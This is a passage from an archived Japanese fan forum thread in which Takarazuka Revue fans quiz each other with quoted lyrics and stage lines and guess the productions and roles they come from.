星組のToo Hot(つづり自信なし…)ですか?
場面はすごい浮かぶんだけど確信が持てないorz
誰かがのりのりでアーメン、ラーメン、ミソラーメンって言ってませんでした?

128 :名無しさん@花束いっぱい。:2006/12/22(金) 11:50:17 ID:NdGsBHeS
>>127
正解!
シギちゃんがめちゃくちゃ可愛かった〜。
けど、シメさんのあっかんべえはちょっとやり過ぎだったw
(ファンだったけど)
因に「アーメン・ラーメン・ミソラーメン」は
マメコさんだったと思います。

129 :名無しさん@花束いっぱい。:2006/12/23(土) 12:02:27 ID:PO1Ok0Gx
問題(歌詞)
1.色は何色 初恋の 淡い水色 涙色
2.夢幻の花 紫苑の月 砂漠の雪 地上の星


130 :名無しさん@花束いっぱい。:2006/12/23(土) 12:54:02 ID:MDKPu6WV
>129
2は夢は世界をかけめぐるの主題歌

131 :名無しさん@花束いっぱい。:2006/12/23(土) 19:41:24 ID:FxBmCB1G
歌詞の問題:

さらさらと鳴る絹の裳裾を夜霧に濡らし、さあ恋人よ共に夜を歩こう

132 :名無しさん@花束いっぱい。:2006/12/23(土) 21:00:32 ID:fdLJ9zbs
歌詞です。


しきたりどおりのウェディング 慎ましく 厳かな 結婚

133 :名無しさん@花束いっぱい。:2006/12/23(土) 21:28:04 ID:oiyWMTmY
問題です。
台詞「おれはワーニカと呼ばれた 絵の好きな少年だった」

歌詞「闇にひとすじ 輝く光 勇気をくれた ア〜
はるか彼方から 新しい仲間 銀河をこえて」

134 :名無しさん@花束いっぱい。:2006/12/24(日) 05:16:14 ID:/v85Glu2
>>132
「ウォーターフロント・ララバイ」?自信無しorz

>>133
台詞は「遥かなる旅路の果てに」のサビーニン。

135 :名無しさん@花束いっぱい。:2006/12/24(日) 08:31:48 ID:q2DRpVLX
>>134タソ

正解!!!好きだったんですよー、この曲。

136 :名無しさん@花束いっぱい。:2006/12/24(日) 13:12:55 ID:/v85Glu2
歌詞の問題。

「君と素肌を重ねて、愛の傷跡隠して」

超簡単、サービス問題w

137 :133:2006/12/24(日) 22:09:38 ID:ijympNaU
>>134
正解です!

ではまた台詞の問題を・・・。
1「ああ、あの歌 あのフィガロ、良かったですよ」

2「パスタは嫌いなのよ」

138 :名無しさん@花束いっぱい。:2006/12/24(日) 23:03:24 ID:1OrdFfa2
>>137さん
2の台詞は「ヴァレンチノ」のナターシャですね!
あんなにおいしそうなのにねえ。

139 :名無しさん@花束いっぱい。:2006/12/24(日) 23:08:42 ID:YZ+9S6PN
>>133
歌詞は星組「ジュピリータイム」の宇宙を峰さんがさ迷う場面の最後に歌われた曲?
確か大劇場と東宝で場面のあらすじが違ったような?

>>137
1.の台詞は、星組「炎のボレロ」の最後の方で
ヨウちゃんが婚約者だったマイマイさんに別れを告げる時に言った台詞かな?

140 :名無しさん@花束いっぱい。:2006/12/25(月) 00:45:40 ID:KwK5rndQ
台詞の問題です

てのひらに余るほどの 胸から溢れ出すほどのことを教わって…

141 :名無しさん@花束いっぱい。:2006/12/25(月) 00:51:35 ID:6rbuATao
>131
月組のアンジェリク
好きだったなあ。再演したら良いのに。

142 :名無しさん@花束いっぱい。:2006/12/25(月) 01:25:38 ID:55usjWHi
>>136
月組「レビュー・オブ・ドリームス」。
崩し黒燕尾のフィナーレナンバー。

台詞の問題です。
「忘れないよ。お前のダンス」

143 :名無しさん@花束いっぱい。:2006/12/25(月) 01:43:52 ID:yZGhPo4K
>>142
「堕天使の涙」ジャン=ポール

144 :名無しさん@花束いっぱい。:2006/12/25(月) 12:47:31 ID:WOQ7POzH
>>142、正解!

145 :133,137:2006/12/25(月) 14:48:43 ID:Ig1UHihO
>>138
正解です!
本当に。美味しそうなトマトソーススパゲティでしたねえ。

>>139
2問とも正解です!
133は大劇場では但馬久美さんに峰さんが助けられ
東京では但馬さんを峰さんがやっつけてました(笑)
134はヨウちゃんの台詞通り、本当にマイマイさんの歌が
素晴らしかったです。


146 :名無しさん@花束いっぱい。:2006/12/25(月) 19:07:03 ID:WT0oW/AE
>>140
「花の業平」の高子さま。

147 :名無しさん@花束いっぱい。:2006/12/25(月) 23:55:52 ID:VC2tQfnc
何かに答えようと思ったのですが、見当たらないので問題を…

「音程気にせず胸張り叫べば新しい歌が生まれるかも」

タニちゃんに贈ってあげたい歌ですw(本人出てたし)

148 :名無しさん@花束いっぱい。:2006/12/26(火) 17:10:08 ID:/fRFuyiD
歌詞の問題です。
1「地獄の沙汰も金次第」
2「私はスリよ、スリなの」

2問ともバウ作品です、宜しくお願いします!

149 :名無しさん@花束いっぱい。:2006/12/26(火) 22:20:43 ID:q8D8eaYr
>>148
2は「Shion」の第2部のあやかちゃんのスリの女の子?
可愛かったよね、シメさんの眼鏡姿は面白かったw

150 :名無しさん@花束いっぱい。:2006/12/27(水) 00:43:04 ID:Yl9UVe+F
>>148
1もバウ?ナターシャでもリンゴさんが言ってたような…
あ、あれは地獄の沙汰も「曽根」次第だったっけ?w

151 :148:2006/12/27(水) 17:14:21 ID:WnGH1aI0
>>149
正解です☆
シメさんに「オス!」と挨拶してしまう可愛いながらも
男前のあやちゃんでしたね。

>>150
「心中恋の大和路」の封印切りながら歌う忠兵衛さんのつもりでした。
うろ覚えすぎたかも・・・すみませんっ!

152 :名無しさん@花束いっぱい。:2006/12/27(水) 17:21:45 ID:ynzYT97C
問題です。
台詞「姉は貞淑な人妻でした」

153 :名無しさん@花束いっぱい。:2006/12/27(水) 20:37:22 ID:H8YtXuKb
>>152
うろ覚えだけどギャツビーかなあ?
マートルが死んで、妹の朝霧舞ちゃんが泣きながら言うセリフ。
セリフの問題です。
1「それが、戦場でなければ…」
2「そうでもないかな。お金をたくさん残してくれたわ。」

154 :名無しさん@花束いっぱい。:2006/12/27(水) 20:57:55 ID:lmXkm1sS
>153さん
2は「哀しみのコルドバ」のエバの台詞ですね。


155 :名無しさん@花束いっぱい。:2006/12/27(水) 20:58:09 ID:pXcTe9CX
>>152
2.は「悲しみのコルドバ」のエリオとエバの夜会での再会で
エバが最初の結婚について語るセリフかな
私はツッツさんの言い回しが頭に浮かんだな
エバはツッツさんとミハルちゃん両方とも好きです

156 :名無しさん@花束いっぱい。:2006/12/27(水) 21:02:43 ID:pXcTe9CX
>>155
>>153さんへのレスです
しかも被ってしまった…orz

これだけは何なので
歌詞の問題

「この香り この光 人を夢に誘う」

157 :名無しさん@花束いっぱい。:2006/12/27(水) 21:31:47 ID:0lCCDm/j
>>153
1はよっちゃんが浮かぶんだけど、エールの残照かな?

私からも歌詞問題。割と最近め。
「赤い星の悪戯に、狼達の遠吠え
愛に飢えて孤独な眠れぬ夜が続く」

158 :152:2006/12/27(水) 22:00:12 ID:Oivn+/9k
>>153
正解です!

では問題を・・・。

歌詞1「アドバイスもいらぬ 聞きたくない」
歌詞2「あたしの胸にすがって泣けば あの娘(こ)のことなど
忘れるさ」

159 :名無しさん@花束いっぱい。:2006/12/27(水) 22:05:52 ID:P27p8Ubq
台詞の問題です。
1「私はお前達の結婚を許すことにしたよ。だが・・・」

2「私がロシア皇帝の為にも働いていることを知っていたのなら
何故あなたは私にお金を払い続けてこられたの?」

160 :名無しさん@花束いっぱい。:2006/12/28(木) 02:30:11 ID:4KyrJxCY
>141さん

正解です。終わり方が中途半端だったけど、
いい配役でしたね。私ももう一度観たい。

161 :sage:2006/12/28(木) 21:59:14 ID:YDHfuzL6
>>147さん 
「CAN−CAN」の裁判長と検事さんの歌ですね。
大好きな歌の一つです。
ただタニちゃんは充分音程を気にせず叫んでいるかと・・・。

162 :名無しさん@花束いっぱい。:2006/12/28(木) 22:58:18 ID:K4JCbrfl
台詞の問題です
『あなたは私を信じてくださらなかった。私が本当にそんなことをすると思って?』

163 :名無しさん@花束いっぱい。:2006/12/28(木) 22:59:55 ID:yyOYlJ0e
http://www.skystage.net/program/img/200211/10_1.jpg

164 :名無しさん@花束いっぱい。:2006/12/28(木) 23:13:32 ID:jQuY393Q
台詞です。
「あなたは私を救ってはくださらなかった」

165 :名無しさん@花束いっぱい。:2006/12/28(木) 23:21:33 ID:yyOYlJ0e
絵麻緒ゆうがトップに固執したとき飢え爺に訴えかけたセリフですね

166 :名無しさん@花束いっぱい。:2006/12/28(木) 23:37:56 ID:iNbpYA2x
>>162
「ときめきの花の伝説」?
でも、あれは「あなたは私を信じて下さらなかった、
女にとってそれがどんなに辛いことか」だっけ?
「私が本当に〜」もミミちゃんが言ってた記憶があるんだが。
東京でかなり台詞変更があったんで、記憶がごっちゃになってるかも、スマソ。

167 :名無しさん@花束いっぱい。:2006/12/29(金) 01:03:38 ID:BTTwy5Tb
>>164
「血と砂」のミエちゃんの台詞ですね。
あの作品のケロちゃんとの16禁バリのラブシーンはすごいかったなー
るいるいはまだ男役でしたね。主要キャストはあとユウヒしか残っていないね‥

168 :名無しさん@花束いっぱい。:2006/12/29(金) 01:19:41 ID:z/dpKltE
台詞の問題
さあ、静かに眠れ、春の中で。

169 :名無しさん@花束いっぱい。:2006/12/29(金) 08:02:28 ID:98frrZ5r
>168 ヘス中佐(プラハの春)ねったん…
あ、関西も今朝は雪が降ってるよー

170 :名無しさん@花束いっぱい。:2006/12/29(金) 08:42:30 ID:V7foK5PZ
>167
おときちも居りますが…>血と砂メインキャスト

171 :名無しさん@花束いっぱい。:2006/12/29(金) 11:03:19 ID:rS61ZUEv
167さん、正解です♪
まだ残ってる人もいるけど、組替えや退団された人が多いですね。メインという言葉が難しいけど、血と砂はほとんど全員に役と台詞がありましたね。

172 :名無しさん@花束いっぱい。:2006/12/29(金) 12:57:30 ID:QE0IyMWk
>>166さん正解!
たしかに女にとって〜ありましたね、忘れてました。すみません。
古いので記憶があいまいでした。

173 :名無しさん@花束いっぱい。:2006/12/29(金) 21:27:43 ID:iopyjwj/
立ち向かうまでだっ!

174 :名無しさん@花束いっぱい。:2006/12/29(金) 21:34:38 ID:NJrkZEom
ゼンダ?

175 :名無しさん@花束いっぱい。:2006/12/29(金) 21:38:13 ID:iopyjwj/
ちがうよ。

176 :名無しさん@花束いっぱい。:2006/12/29(金) 21:43:48 ID:DVXpd0fb
亀だけどエールの残照、ヨシコちゃん正解。コルドバのエバも正解。
173はなんとなく一路さんのような気もするけど…。
上の方も出題した人はそろそろ答え教えて下さい。

177 :名無しさん@花束いっぱい。:2006/12/29(金) 21:50:44 ID:iopyjwj/
ブルボンの封印のルイ14世になりきることを決めたジェームズの台詞です。

178 :名無しさん@花束いっぱい。:2006/12/29(金) 22:02:18 ID:GrtrHrBB
亀&曖昧ですが>>107の歌詞1
「タカラヅカ・ドリーム・キングダム」のフィナーレ?の曲でしょうか。
(解答済でしたらすみません。)

179 :名無しさん@花束いっぱい。:2006/12/30(土) 00:41:31 ID:Q6NmnreP
>>177
「もしその運命が、災いをもたらすとしたら?!」の返しでしたね。
原作を先に読んだ者としては、脚本の酷さに唖然とするとともに、
一路さん・高嶺さんの美しさにも唖然としました。ビジュアルは最高
だったんだよね。
超マニアックな話ですが、『ブルボンの封印』は宝塚を扱った漫画『天使の魅る夢』にも
一コマだけ出てきます。銀橋で歌うフィリップ(一路さん)。

歌詞の問題です。
「だけど今は 生まれてきたのはこのためと 信じていられる恋だから」

180 :名無しさん@花束いっぱい。:2006/12/30(土) 18:19:15 ID:ApxhgNTr
>>157のヒント、花組のショーです。


これだけだと何なので、追加問題。
歌詞「デイジーはダーリン、アイリスはスウィート、
リリーはラブリー、愛らしい」

ヒント>星組です。

181 :名無しさん@花束いっぱい。:2006/12/30(土) 20:01:24 ID:eNN41EwH
>>180
ダメもとでいきます。
「ディガディガドゥ」のプロローグでシメさんが歌った歌ですか?

182 :名無しさん@花束いっぱい。:2006/12/31(日) 16:27:52 ID:5SQFQ6Bl
>>181
正解!
あのプロローグ好きだったんですよね〜、
衣裳も白と黒でシックな感じで。

183 :名無しさん@花束いっぱい。:2006/12/31(日) 19:10:49 ID:8DJdwD/l
歌詞「燃える砂に夢を見て燃える砂に恋をする」

184 : 【だん吉】 【736円】 :2007/01/01(月) 00:07:10 ID:hoMH2stE
あけおめことよろ〜

185 : 【大吉】 【1508円】 :2007/01/01(月) 11:46:09 ID:4DlGMhJt
>157
兄貴&ゆみこのアイ ガッチャですね!

>178タン、正解です!

186 :名無しさん@花束いっぱい。:2007/01/01(月) 12:33:26 ID:KaKZSgZF
>>185
正解!
年越したけどw、正解出て嬉しいです。

187 :名無しさん@花束いっぱい。:2007/01/01(月) 18:55:38 ID:iR95W3Fq
台詞の問題です。

1「またナポレオンと戦わなくてはいけないのか」

2「ナポレオンは素晴らしい皇帝です」

演者は違いますが、同一人物です。

188 :名無しさん@花束いっぱい。:2007/01/06(土) 10:19:40 ID:IJE2RE2+
歌詞です。
カスターは虫を食べる。ちょっと焼いて。

189 :名無しさん@花束いっぱい。:2007/01/06(土) 11:45:46 ID:qyRtAB+X
>188
あー…題名が忘却の彼方ですが…
カスターはマミちゃんですよね。
天海のゆりちゃんのバウ公演。
かわいい娘役さん達が歌ってました。

190 :名無しさん@花束いっぱい。:2007/01/06(土) 18:04:55 ID:QPKchR6i
>>188
>>189
「夢の10セント銀貨」ですね!
(「金貨」だったっけ…?)

191 :名無しさん@花束いっぱい。:2007/01/06(土) 20:26:33 ID:CXDgYZom
歌詞の問題です!
「ああ剣のかがやき〜」

簡単かも・・・。

192 :名無しさん@花束いっぱい。:2007/01/06(土) 23:18:49 ID:uTdftdVi
>188
歌ってた中にエトワールもやってた星野瞳、たれちゃんもいましたね。
美声で歌うので更に大爆笑でした。
>189
正解。銀貨の方であってます。

>190
歌詞からするとウタコさんのバウ、スウォードフラッシュですか?

193 :190:2007/01/07(日) 18:09:12 ID:gd7KshTm
>>192
そうです正解です!


194 :名無しさん@花束いっぱい。:2007/01/07(日) 21:05:00 ID:x31plaB/
台詞の問題です。

A「見るなよ」
B「イヤン!」

Aは娘役さん、Bは男役さんの台詞です。
宜しくお願いします!

195 :名無しさん@花束いっぱい。:2007/01/07(日) 22:28:27 ID:Hwp0d7j/
>>194
『Action!』のあやかちゃんとマリコさん?

私からも台詞問題。
「いけません、この線を越えてはいけません」

196 :194:2007/01/08(月) 18:54:59 ID:BdNhz0fL
>>195
正解です☆

で、台詞の答えは「南の哀愁」のナイヤでしょうか?

197 :194:2007/01/09(火) 00:02:14 ID:Y/ivc3yF
>>196
はい、正解です♪

198 :名無しさん@花束いっぱい。:2007/01/09(火) 21:19:17 ID:/eD6kV2j
台詞の問題です。
「メッテルニヒ閣下はどこにおられますか〜!」

私はこの台詞でこの生徒のファンになりました(ぼそっ)

49 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)